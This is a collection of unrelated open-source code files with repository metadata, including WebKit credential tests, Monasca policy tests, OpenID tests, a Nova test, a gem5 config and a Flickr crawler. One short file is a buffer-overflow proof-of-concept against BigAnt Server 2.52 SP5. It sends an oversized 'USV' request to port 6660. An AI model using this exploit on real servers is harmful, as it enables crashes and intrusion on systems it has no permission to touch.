# credential source could be affected by the user's environment.
self.assertEqual(credentials.read_credentials(), ("test@webkit.org", "SECRETSAUCE"))
def test_keyring_without_git_repo(self):
# FIXME: This should share more code with test_read_credentials_without_git_repo
class MockKeyring(object):
def get_password(self, host, username):
return "NOMNOMNOM"
class FakeCredentials(MockedCredentials):
def _is_mac_os_x(self):
return True
def _credentials_from_keychain(self, username):
return ("test@webkit.org", None)
def _credentials_from_environment(self):
return (None, None)
with _TemporaryDirectory(suffix="not_a_git_repo") as temp_dir_path:
credentials = FakeCredentials("fake.hostname", cwd=temp_dir_path, keyring=MockKeyring())
# FIXME: Using read_credentials here seems too broad as higher-priority
# credential source could be affected by the user's environment.
self.assertEqual(credentials.read_credentials(), ("test@webkit.org", "NOMNOMNOM"))
def test_keyring_without_git_repo_nor_keychain(self):
class MockKeyring(object):
def get_password(self, host, username):
return "NOMNOMNOM"
class FakeCredentials(MockedCredentials):
def _credentials_from_keychain(self, username):
return (None, None)
def _credentials_from_environment(self):
return (None, None)
class FakeUser(MockUser):
@classmethod
def prompt(cls, message, repeat=1, raw_input=raw_input):
return "test@webkit.org"
@classmethod
def prompt_password(cls, message, repeat=1, raw_input=raw_input):
raise AssertionError("should not prompt for password")
with _TemporaryDirectory(suffix="not_a_git_repo") as temp_dir_path:
credentials = FakeCredentials("fake.hostname", cwd=temp_dir_path, keyring=MockKeyring())
# FIXME: Using read_credentials here seems too broad as higher-priority
# credential source could be affected by the user's environment.
self.assertEqual(credentials.read_credentials(FakeUser), ("test@webkit.org", "NOMNOMNOM"))
if __name__ == '__main__':
unittest.main()
|
leighpauls/k2cro4
|
third_party/WebKit/Tools/Scripts/webkitpy/common/net/credentials_unittest.py
|
Python
|
bsd-3-clause
| 9,141
|
""" Course API """
from openedx.core.djangoapps.waffle_utils import WaffleSwitch, WaffleSwitchNamespace
WAFFLE_SWITCH_NAMESPACE = WaffleSwitchNamespace(name='course_list_api_rate_limit')
USE_RATE_LIMIT_2_FOR_COURSE_LIST_API = WaffleSwitch(WAFFLE_SWITCH_NAMESPACE, 'rate_limit_2')
USE_RATE_LIMIT_10_FOR_COURSE_LIST_API = WaffleSwitch(WAFFLE_SWITCH_NAMESPACE, 'rate_limit_10')
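# A minimal usage sketch (hypothetical call site; assumes the WaffleSwitch
# wrapper exposes an is_enabled() check, and the throttle rate strings are
# purely illustrative):
#
#     if USE_RATE_LIMIT_10_FOR_COURSE_LIST_API.is_enabled():
#         throttle_rate = '10/minute'
#     elif USE_RATE_LIMIT_2_FOR_COURSE_LIST_API.is_enabled():
#         throttle_rate = '2/minute'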
|
edx-solutions/edx-platform
|
lms/djangoapps/course_api/__init__.py
|
Python
|
agpl-3.0
| 379
|
# Copyright 2016-2017 FUJITSU LIMITED
# Copyright 2018 OP5 AB
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from falcon import testing
from monasca_common.policy import policy_engine as policy
from oslo_context import context
from oslo_policy import policy as os_policy
from monasca_log_api.app.base import request
from monasca_log_api.policies import roles_list_to_check_str
from monasca_log_api.tests import base
class TestPolicyFileCase(base.BaseTestCase):
def setUp(self):
super(TestPolicyFileCase, self).setUp()
self.context = context.RequestContext(user='fake',
tenant='fake',
roles=['fake'])
self.target = {'tenant_id': 'fake'}
def test_modified_policy_reloads(self):
tmp_file = \
self.create_tempfiles(files=[('policies', '{}')], ext='.yaml')[0]
base.BaseTestCase.conf_override(policy_file=tmp_file,
group='oslo_policy')
policy.reset()
policy.init()
action = 'example:test'
rule = os_policy.RuleDefault(action, '')
policy._ENFORCER.register_defaults([rule])
with open(tmp_file, 'w') as policy_file:
policy_file.write('{"example:test": ""}')
policy.authorize(self.context, action, self.target)
with open(tmp_file, 'w') as policy_file:
policy_file.write('{"example:test": "!"}')
policy._ENFORCER.load_rules(True)
self.assertRaises(os_policy.PolicyNotAuthorized, policy.authorize,
self.context, action, self.target)
class TestPolicyCase(base.BaseTestCase):
def setUp(self):
super(TestPolicyCase, self).setUp()
rules = [
os_policy.RuleDefault("true", "@"),
os_policy.RuleDefault("example:allowed", "@"),
os_policy.RuleDefault("example:denied", "!"),
os_policy.RuleDefault("example:lowercase_monasca_user",
"role:monasca_user or role:sysadmin"),
os_policy.RuleDefault("example:uppercase_monasca_user",
"role:MONASCA_USER or role:sysadmin"),
]
policy.reset()
policy.init()
policy._ENFORCER.register_defaults(rules)
def test_authorize_nonexist_action_throws(self):
action = "example:noexist"
ctx = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "fake",
"X_PROJECT_ID": "fake",
"X_ROLES": "member"
}
)
)
self.assertRaises(os_policy.PolicyNotRegistered, policy.authorize,
ctx.context, action, {})
def test_authorize_bad_action_throws(self):
action = "example:denied"
ctx = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "fake",
"X_PROJECT_ID": "fake",
"X_ROLES": "member"
}
)
)
self.assertRaises(os_policy.PolicyNotAuthorized, policy.authorize,
ctx.context, action, {})
def test_authorize_bad_action_no_exception(self):
action = "example:denied"
ctx = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "fake",
"X_PROJECT_ID": "fake",
"X_ROLES": "member"
}
)
)
result = policy.authorize(ctx.context, action, {}, False)
self.assertFalse(result)
def test_authorize_good_action(self):
action = "example:allowed"
ctx = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "fake",
"X_PROJECT_ID": "fake",
"X_ROLES": "member"
}
)
)
result = policy.authorize(ctx.context, action, {}, False)
self.assertTrue(result)
def test_ignore_case_role_check(self):
lowercase_action = "example:lowercase_monasca_user"
uppercase_action = "example:uppercase_monasca_user"
monasca_user_context = request.Request(
testing.create_environ(
path="/",
headers={
"X_USER_ID": "monasca_user",
"X_PROJECT_ID": "fake",
"X_ROLES": "MONASCA_user"
}
)
)
self.assertTrue(policy.authorize(monasca_user_context.context,
lowercase_action,
{}))
self.assertTrue(policy.authorize(monasca_user_context.context,
uppercase_action,
{}))
class RegisteredPoliciesTestCase(base.BaseTestCase):
def __init__(self, *args, **kwds):
super(RegisteredPoliciesTestCase, self).__init__(*args, **kwds)
self.default_roles = ['monasca-user', 'admin']
def test_healthchecks_policies_roles(self):
healthcheck_policies = {
'log_api:healthcheck:head': ['any_role'],
'log_api:healthcheck:get': ['any_role']
}
self._assert_rules(healthcheck_policies)
def test_versions_policies_roles(self):
versions_policies = {
'log_api:versions:get': ['any_role']
}
self._assert_rules(versions_policies)
def test_logs_policies_roles(self):
logs_policies = {
'log_api:logs:post': self.default_roles
}
self._assert_rules(logs_policies)
def _assert_rules(self, policies_list):
for policy_name in policies_list:
registered_rule = policy.get_rules()[policy_name]
if hasattr(registered_rule, 'rules'):
self.assertEqual(len(registered_rule.rules),
len(policies_list[policy_name]))
for role in policies_list[policy_name]:
ctx = self._get_request_context(role)
self.assertTrue(policy.authorize(ctx.context,
policy_name,
{})
)
@staticmethod
def _get_request_context(role):
return request.Request(
testing.create_environ(
path='/',
headers={'X_ROLES': role}
)
)
class PolicyUtilsTestCase(base.BaseTestCase):
def test_roles_list_to_check_str(self):
self.assertEqual(roles_list_to_check_str(['test_role']), 'role:test_role')
self.assertEqual(roles_list_to_check_str(['role1', 'role2', 'role3']),
'role:role1 or role:role2 or role:role3')
self.assertEqual(roles_list_to_check_str(['@']), '@')
self.assertEqual(roles_list_to_check_str(['role1', '@', 'role2']),
'role:role1 or @ or role:role2')
self.assertIsNone(roles_list_to_check_str(None))
|
stackforge/monasca-log-api
|
monasca_log_api/tests/test_policy.py
|
Python
|
apache-2.0
| 7,850
|
#exp1
#!/usr/bin/python
import socket
target_address="127.0.0.1"
target_port=6660
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
|
onedal88/Exploits-1
|
BigAnt Server 2.52 SP5/exp/exp1.py
|
Python
|
gpl-3.0
| 282
|
# -*- coding: utf-8 -*-
__author__ = 'Alan Tai'
'''
Created on Jun 24, 2014
@author: Alan Tai
'''
import logging
import jinja2
import webapp2
import json
from dictionaries.dict_keys_values import KeysVaulesGeneral
from handlers.handler_webapp2_extra_auth import BaseHandler
from models.models_video_info import VideoInfo
# dictionaries
dict_general = KeysVaulesGeneral()
# jinja environment
jinja_environment = jinja2.Environment(loader=jinja2.FileSystemLoader('static/templates'))
# dispatchers
class VideosDataUploadDispatcher(BaseHandler):
def post(self):
""" handler of dealing with geo info update """
if self._is_json(self.request.get('video_data')):
json_article_data = json.loads(self.request.get('video_data'))
for elem in json_article_data:
query = VideoInfo.query(VideoInfo.id == elem["id"])
if (query.count() == 0):
new_video = VideoInfo()
new_video.id = elem["id"]
new_video.sys_id = elem["sys_id"]
new_video.title = elem["title"]
new_video.description = elem["description"]
new_video.publishedAt = elem["publishedAt"]
new_video.thumbnails = elem["thumbnails"]
new_video.put()
status = 'success'
else:
status = 'received variable is not in JSON format'
# ajax response
ajax_response = {'status': status}
self.response.out.headers['Content-Type'] = 'text/json'
self.response.out.write(json.dumps(ajax_response))
# check if variable is in json format
def _is_json(self, arg_json):
try:
json.loads(arg_json)
except ValueError:
return False
return True
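# Expected shape of the 'video_data' POST parameter (illustrative values;
# the field names match the attributes read in post() above):
#
#     [
#         {"id": "abc123", "sys_id": "1", "title": "...",
#          "description": "...", "publishedAt": "2014-06-24T00:00:00Z",
#          "thumbnails": "..."}
#     ]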
# configuration
config = dict_general.config_setting
# app
app = webapp2.WSGIApplication([
webapp2.Route(r'/videos/videos_info_handler', VideosDataUploadDispatcher, name='articles_info_handler')
], debug=True, config=config)
# log
logging.getLogger().setLevel(logging.DEBUG)
from google.appengine.ext import ndb
|
Gogistics/prjTWPublicMovements
|
prjUnlimitedKP/src/dispatchers/dispatchers_videos.py
|
Python
|
apache-2.0
| 2,200
|
import odoo.tests
class TestUi(odoo.tests.HttpCase):
post_install = True
at_install = False
def test_01_admin_widget_x2many(self):
self.phantom_js("/web#action=test_new_api.action_discussions",
"odoo.__DEBUG__.services['web_tour.tour'].run('widget_x2many', 100)",
"odoo.__DEBUG__.services['web_tour.tour'].tours.widget_x2many.ready",
login="admin", timeout=120)
|
chienlieu2017/it_management
|
odoo/odoo/addons/test_new_api/tests/test_ui.py
|
Python
|
gpl-3.0
| 456
|
from django.db import models
class FileMixin(models.Model):
class Meta:
abstract = True
ordering = ('-created_at', '-modified_at', 'title')
def __str__(self):
return self.title
def get_absolute_url(self):
return self.file.url
def save(self, *args, **kwargs):
# Avoid doing file size requests constantly
self.file_size = self.file.size
super().save(*args, **kwargs)
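# A minimal usage sketch (hypothetical concrete model): FileMixin only works
# on subclasses that provide the fields it references above -- title, file,
# file_size, created_at and modified_at.
#
#     class Document(FileMixin):
#         title = models.CharField(max_length=100)
#         file = models.FileField(upload_to='documents/')
#         file_size = models.PositiveIntegerField(default=0)
#         created_at = models.DateTimeField(auto_now_add=True)
#         modified_at = models.DateTimeField(auto_now=True)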
|
developersociety/django-glitter
|
glitter/assets/mixins.py
|
Python
|
bsd-3-clause
| 443
|
import unittest
from openid.yadis import services, etxrd, xri
import os.path
def datapath(filename):
module_directory = os.path.dirname(os.path.abspath(__file__))
return os.path.join(module_directory, 'data', 'test_etxrd', filename)
XRD_FILE = datapath('valid-populated-xrds.xml')
NOXRDS_FILE = datapath('not-xrds.xml')
NOXRD_FILE = datapath('no-xrd.xml')
# None of the namespaces or service URIs below are official (or even
# sanctioned by the owners of that piece of URL-space)
LID_2_0 = "http://lid.netmesh.org/sso/2.0b5"
TYPEKEY_1_0 = "http://typekey.com/services/1.0"
def simpleOpenIDTransformer(endpoint):
"""Function to extract information from an OpenID service element"""
if 'http://openid.net/signon/1.0' not in endpoint.type_uris:
return None
delegates = list(endpoint.service_element.findall(
'{http://openid.net/xmlns/1.0}Delegate'))
assert len(delegates) == 1
delegate = delegates[0].text
return (endpoint.uri, delegate)
class TestServiceParser(unittest.TestCase):
def setUp(self):
self.xmldoc = file(XRD_FILE).read()
self.yadis_url = 'http://unittest.url/'
def _getServices(self, flt=None):
return list(services.applyFilter(self.yadis_url, self.xmldoc, flt))
def testParse(self):
"""Make sure that parsing succeeds at all"""
services = self._getServices()
def testParseOpenID(self):
"""Parse for OpenID services with a transformer function"""
services = self._getServices(simpleOpenIDTransformer)
expectedServices = [
("http://www.myopenid.com/server", "http://josh.myopenid.com/"),
("http://www.schtuff.com/openid", "http://users.schtuff.com/josh"),
("http://www.livejournal.com/openid/server.bml",
"http://www.livejournal.com/users/nedthealpaca/"),
]
it = iter(services)
for (server_url, delegate) in expectedServices:
for (actual_url, actual_delegate) in it:
self.failUnlessEqual(server_url, actual_url)
self.failUnlessEqual(delegate, actual_delegate)
break
else:
self.fail('Not enough services found')
def _checkServices(self, expectedServices):
"""Check to make sure that the expected services are found in
that order in the parsed document."""
it = iter(self._getServices())
for (type_uri, uri) in expectedServices:
for service in it:
if type_uri in service.type_uris:
self.failUnlessEqual(service.uri, uri)
break
else:
self.fail('Did not find %r service' % (type_uri,))
def testGetSeveral(self):
"""Get some services in order"""
expectedServices = [
# type, URL
(TYPEKEY_1_0, None),
(LID_2_0, "http://mylid.net/josh"),
]
self._checkServices(expectedServices)
def testGetSeveralForOne(self):
"""Getting services for one Service with several Type elements."""
types = [ 'http://lid.netmesh.org/sso/2.0b5'
, 'http://lid.netmesh.org/2.0b5'
]
uri = "http://mylid.net/josh"
for service in self._getServices():
if service.uri == uri:
found_types = service.matchTypes(types)
if found_types == types:
break
else:
self.fail('Did not find service with expected types and uris')
def testNoXRDS(self):
"""Make sure that we get an exception when an XRDS element is
not present"""
self.xmldoc = file(NOXRDS_FILE).read()
self.failUnlessRaises(
etxrd.XRDSError,
services.applyFilter, self.yadis_url, self.xmldoc, None)
def testEmpty(self):
"""Make sure that we get an exception when an XRDS element is
not present"""
self.xmldoc = ''
self.failUnlessRaises(
etxrd.XRDSError,
services.applyFilter, self.yadis_url, self.xmldoc, None)
def testNoXRD(self):
"""Make sure that we get an exception when there is no XRD
element present."""
self.xmldoc = file(NOXRD_FILE).read()
self.failUnlessRaises(
etxrd.XRDSError,
services.applyFilter, self.yadis_url, self.xmldoc, None)
class TestCanonicalID(unittest.TestCase):
def mkTest(iname, filename, expectedID):
"""This function builds a method that runs the CanonicalID
test for the given set of inputs"""
filename = datapath(filename)
def test(self):
xrds = etxrd.parseXRDS(file(filename).read())
self._getCanonicalID(iname, xrds, expectedID)
return test
test_delegated = mkTest(
"@ootao*test1", "delegated-20060809.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_delegated_r1 = mkTest(
"@ootao*test1", "delegated-20060809-r1.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_delegated_r2 = mkTest(
"@ootao*test1", "delegated-20060809-r2.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_sometimesprefix = mkTest(
"@ootao*test1", "sometimesprefix.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_prefixsometimes = mkTest(
"@ootao*test1", "prefixsometimes.xrds",
"@!5BAD.2AA.3C72.AF46!0000.0000.3B9A.CA01")
test_spoof1 = mkTest("=keturn*isDrummond", "spoof1.xrds", etxrd.XRDSFraud)
test_spoof2 = mkTest("=keturn*isDrummond", "spoof2.xrds", etxrd.XRDSFraud)
test_spoof3 = mkTest("@keturn*is*drummond", "spoof3.xrds", etxrd.XRDSFraud)
test_status222 = mkTest("=x", "status222.xrds", None)
test_iri_auth_not_allowed = mkTest(
"phreak.example.com", "delegated-20060809-r2.xrds", etxrd.XRDSFraud)
test_iri_auth_not_allowed.__doc__ = \
"Don't let IRI authorities be canonical for the GCS."
# TODO: Refs
# test_ref = mkTest("@ootao*test.ref", "ref.xrds", "@!BAE.A650.823B.2475")
# TODO: Add a IRI authority with an IRI canonicalID.
# TODO: Add test cases with real examples of multiple CanonicalIDs
# somewhere in the resolution chain.
def _getCanonicalID(self, iname, xrds, expectedID):
if isinstance(expectedID, (str, unicode, type(None))):
cid = etxrd.getCanonicalID(iname, xrds)
self.failUnlessEqual(cid, expectedID and xri.XRI(expectedID))
elif issubclass(expectedID, etxrd.XRDSError):
self.failUnlessRaises(expectedID, etxrd.getCanonicalID,
iname, xrds)
else:
self.fail("Don't know how to test for expected value %r"
% (expectedID,))
if __name__ == '__main__':
unittest.main()
|
wtanaka/google-app-engine-django-openid
|
src/openid/test/test_etxrd.py
|
Python
|
gpl-3.0
| 6,886
|
#!/usr/bin/env python
# Aid tools to quality checker.
# Qchecklib
# Eliane Araujo, 2016
import os
import sys
import commands
import json
try:
from cc import measure_complexity
except ImportError:
print("tst quality checker needs cc.py to work.")
sys.exit(1)
try:
sys.path.append('/usr/local/bin/radon/')
from radon.raw import *
from radon.complexity import *
from radon.metrics import *
except ImportError:
print("tst quality checker needs radon to work.")
sys.exit(1)
try:
import urllib.request as urlrequest
except ImportError:
import urllib as urlrequest
url = 'http://qchecklog.appspot.com/api/action/'
def four_metrics(program_name):
return "%s %s %s %s" % ( lloc(program_name), cc(program_name), vhalstead(program_name), pep8(program_name)["count"])
def pep8count(program):
return int(pep8(program)[0])
def pep8(program):
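    # Returns a list whose first element is the total number of E* violations
    # reported by pycodestyle (0 when the output is empty), followed by one
    # entry per violation message with the leading file name stripped off.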
result = []
cmd = 'pycodestyle.py --select=E --count ' + program
try:
pep_errors = commands.getoutput(cmd)
except ImportError:
print("tst quality checker needs pycodestyle.py to work.")
sys.exit(1)
if pep_errors:
for error in pep_errors.splitlines():
if error.isdigit():
result.insert(0, int(error))
break
#remove filename from message.
#Example:
#reference.py:15:16: E225 missing whitespace around operator
result.append( error[error.find(":") + 1:] )
else:
result = [0]
return result
def header_lines(filename):
# Count header's lines
# Consider "coding" and "env" as header
program = open(filename, 'r')
code = program.read()
counter = 0
codelines = code.split("\n")
while codelines[counter].startswith("#"):
counter += 1
program.close()
return counter
def vhalstead(filename):
return halstead_metrics("vol", filename)
def halstead_metrics(options, filename):
#It may be used another options
program = open(filename, 'r')
code = program.read()
if options == 'vol':
h = h_visit(code).volume
else:
h = h_visit(code)
program.close()
return round(h, 2)
def cc(filename):
# Radon complexity method only applies to programs containing classes or functions.
# Using another API to other cases.
program = open(filename, 'r')
code = program.read()
try:
# Use radon
visitor = cc_visit(code)
if len(visitor) <= 0:
# Doesn't have functions or classes.
# Use cc.py
stats = measure_complexity(code)
cc = stats.complexity
else:
cc = 0
for i in range( len(visitor) ):
cc += visitor[i].complexity
except Exception as e:
# Failed
print("qcheck: unable to get cc")
cc = 0
program.close()
return cc
def lloc(filename):
program = open(filename, 'r')
code = program.read()
lines = raw_metrics(code)[1]
program.close()
return lines
def raw_metrics(code):
return analyze(code)
def save(message):
type_ = 'accept'
urlrequest.urlopen(url + type_, data=message)
if __name__ == '__main__':
print("qchecklib is a helper module for tst_qcheck commands")
|
elianearaujo/tst-qcheck
|
bin/qchecklib.py
|
Python
|
agpl-3.0
| 3,348
|
import pytest
class TestHping3:
@pytest.mark.complete("hping3 ")
def test_1(self, completion):
assert completion
|
algorythmic/bash-completion
|
test/t/test_hping3.py
|
Python
|
gpl-2.0
| 131
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.tests.functional.v3 import test_servers
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class ConsoleOutputSampleJsonTest(test_servers.ServersSampleBase):
extension_name = "os-console-output"
extra_extensions_to_load = ["os-access-ips"]
_api_version = 'v2'
def _get_flags(self):
f = super(ConsoleOutputSampleJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.console_output.'
'Console_output')
return f
def test_get_console_output(self):
uuid = self._post_server()
response = self._do_post('servers/%s/action' % uuid,
'console-output-post-req', {})
subs = self._get_regexes()
self._verify_response('console-output-post-resp', subs, response, 200)
|
takeshineshiro/nova
|
nova/tests/functional/v3/test_console_output.py
|
Python
|
apache-2.0
| 1,656
|
# Copyright 2012 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Sumit Naiksatam, Cisco Systems, Inc.
import abc
import inspect
import six
@six.add_metaclass(abc.ABCMeta)
class L2DevicePluginBase(object):
"""Base class for a device-specific plugin.
An example of a device-specific plugin is a Nexus switch plugin.
The network model relies on device-category-specific plugins to perform
the configuration on each device.
"""
@abc.abstractmethod
def create_network(self, tenant_id, net_name, net_id, vlan_name, vlan_id,
**kwargs):
"""Create network.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def delete_network(self, tenant_id, net_id, **kwargs):
"""Delete network.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def update_network(self, tenant_id, net_id, name, **kwargs):
"""Update network.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def create_port(self, tenant_id, net_id, port_state, port_id, **kwargs):
"""Create port.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def delete_port(self, tenant_id, net_id, port_id, **kwargs):
"""Delete port.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def update_port(self, tenant_id, net_id, port_id, **kwargs):
"""Update port.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def plug_interface(self, tenant_id, net_id, port_id, remote_interface_id,
**kwargs):
"""Plug interface.
:returns:
:raises:
"""
pass
@abc.abstractmethod
def unplug_interface(self, tenant_id, net_id, port_id, **kwargs):
"""Unplug interface.
:returns:
:raises:
"""
pass
def create_subnet(self, tenant_id, net_id, ip_version,
subnet_cidr, **kwargs):
"""Create subnet.
:returns:
:raises:
"""
pass
def get_subnets(self, tenant_id, net_id, **kwargs):
"""Get subnets.
:returns:
:raises:
"""
pass
def get_subnet(self, tenant_id, net_id, subnet_id, **kwargs):
"""Get subnet.
:returns:
:raises:
"""
pass
def update_subnet(self, tenant_id, net_id, subnet_id, **kwargs):
"""Update subnet.
:returns:
:raises:
"""
pass
def delete_subnet(self, tenant_id, net_id, subnet_id, **kwargs):
"""Delete subnet.
:returns:
:raises:
"""
pass
@classmethod
def __subclasshook__(cls, klass):
"""Check plugin class.
The __subclasshook__ method is a class method
that will be called every time a class is tested
using issubclass(klass, Plugin).
In that case, it will check that every method
marked with the abstractmethod decorator is
provided by the plugin class.
"""
if cls is L2DevicePluginBase:
for method in cls.__abstractmethods__:
method_ok = False
for base in klass.__mro__:
if method in base.__dict__:
fn_obj = base.__dict__[method]
if inspect.isfunction(fn_obj):
abstract_fn_obj = cls.__dict__[method]
arg_count = fn_obj.func_code.co_argcount
expected_arg_count = \
abstract_fn_obj.func_code.co_argcount
method_ok = arg_count == expected_arg_count
if method_ok:
continue
return NotImplemented
return True
return NotImplemented
|
shakamunyi/neutron-vrrp
|
neutron/plugins/cisco/l2device_plugin_base.py
|
Python
|
apache-2.0
| 4,551
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Steve Reinhardt
import m5
from m5.objects import *
m5.util.addToPath('../configs/common')
class MyCache(BaseCache):
assoc = 2
block_size = 64
hit_latency = '1ns'
response_latency = '1ns'
mshrs = 10
tgts_per_mshr = 5
class MyL1Cache(MyCache):
is_top_level = True
tgts_per_mshr = 20
cpu = DerivO3CPU(cpu_id=0)
cpu.addTwoLevelCacheHierarchy(MyL1Cache(size = '128kB'),
MyL1Cache(size = '256kB'),
MyCache(size = '2MB'))
cpu.clock = '2GHz'
system = System(cpu = cpu,
physmem = SimpleMemory(),
membus = CoherentBus())
system.system_port = system.membus.slave
system.physmem.port = system.membus.master
# create the interrupt controller
cpu.createInterruptController()
cpu.connectAllPorts(system.membus)
root = Root(full_system = False, system = system)
|
lastweek/gem5
|
tests/configs/o3-timing.py
|
Python
|
bsd-3-clause
| 2,441
|
class FixedPointTheorem:
def cycleRange(self, R):
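        # Iterates the logistic map x -> R * x * (1 - x) from x = 0.25; the
        # first 200000 iterations let transients die out, and the spread
        # (high - low) of the remaining 1000 values approximates the width of
        # the attractor: ~0 for a fixed point, larger for a cycle or chaos.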
x = 0.25
high = -1
low = 999
for i in range(0, 201001):
x = R * x * (1-x)
if(i > 200000):
if(x > high):
high = x
if(x < low):
low = x
return high - low
|
mikefeneley/topcoder
|
src/SRM-152/fixed_point_theorem.py
|
Python
|
mit
| 351
|
#!/usr/bin/python
# Image querying script written by Tamara Berg,
# and extended heavily James Hays
# Modified by Juan C. Caicedo on Jan. 2013
# Further modified by Cecilia Mauceri Feb 2015
import sys, string, math, time, socket
import random, os, re
import threading
from multiprocessing import Queue, JoinableQueue
from queue import Empty
import subprocess
import crawler.config
from crawler.flickrapi2 import FlickrAPI, FlickrExpatError
from datetime import datetime
from crawler.dbdirs import DBDirectories
from crawler.download_thread_toSQL import DownloadImageThread, simpleDateFormat
import xml.parsers.expat
from requests.exceptions import SSLError
class MultiThreadedFlickrCrawler:
###########################################################################
# System parameters and initializations
###########################################################################
def __init__(self, cfg, category, max_num_images, communication_q, rate_limit):
self.cfg = cfg
self.category = category
argv = self.cfg.vars
self.communication_q = communication_q
self.do_exit = False
self.rate_limit = rate_limit
self.rate_q = Queue()
# flickr auth information: change these to your flickr api keys and secret
self.flickrAPIkeys = argv["flickrAPIkeys"].split(', ') # API key
self.flickrAPIsecrets = argv["flickrAPIsecrets"].split(', ') # shared "secret"
self.queryFileName = argv["queryFileName"] #'query_terms.txt'
self.homeDir = argv["homeDir"]
self.imagesPerDir = int(argv["imagesPerDir"])
self.flickrerrors = 0
# Crawler parameters
self.resultsPerPage = int(argv["resultsPerPage"])
self.downloadsPerQuery = int(argv["downloadsPerQuery"])
self.numberOfThreads = int(argv["numberOfThreads"])
self.startTime = int(argv["crawlerBeginTime"]) #1072915200 # 01/01/2004
self.finalTime = int(time.time())
self.singleDay = 86400 # 24hr*60min*60sec = 1day
self.max_num_images = max_num_images
self.database = argv["databaseName"]
# Structures Initialization
self.dbdir = DBDirectories(self.homeDir, argv["sysdir"], category)
self.indexOfUniqueImages = self.dbdir.inf + 'imageIndex.txt'
self.indexOfUniqueUsers = self.dbdir.inf + 'usersIndex.txt'
self.recentUsers = dict()
self.queryTerms = []
# Multithreaded downloading of images
self.queue = JoinableQueue()
self.out_queue = JoinableQueue()
self.threadsList = []
for i in range(self.numberOfThreads):
t = DownloadImageThread(self.queue, self.out_queue, self.dbdir.img, self.dbdir.txt, self.category,
self.database)
t.setDaemon(True)
t.start()
self.threadsList.append(t)
print(("{} initialized".format(self.category)))
###########################################################################
# Method to load query terms
###########################################################################
def loadQueries(self):
# Each term is a category
self.queryTerms = [self.category]
print(('positive queries:', self.queryTerms))
list(map(lambda t: t.setValidTags(self.queryTerms), self.threadsList))
return len(self.queryTerms)
###########################################################################
# Method to load index of image names
###########################################################################
def loadImageNamesIndex(self):
print('Loading index of images')
if os.path.exists(self.indexOfUniqueImages):
self.allImageNames = dict(
[(img.replace('\n', ''), True) for img in open(self.indexOfUniqueImages).readlines()])
print(('Index with', len(self.allImageNames), 'names is ready to use'))
else:
self.allImageNames = dict()
print(('No previous index found at {}'.format(self.indexOfUniqueImages)))
print('Loading index of users')
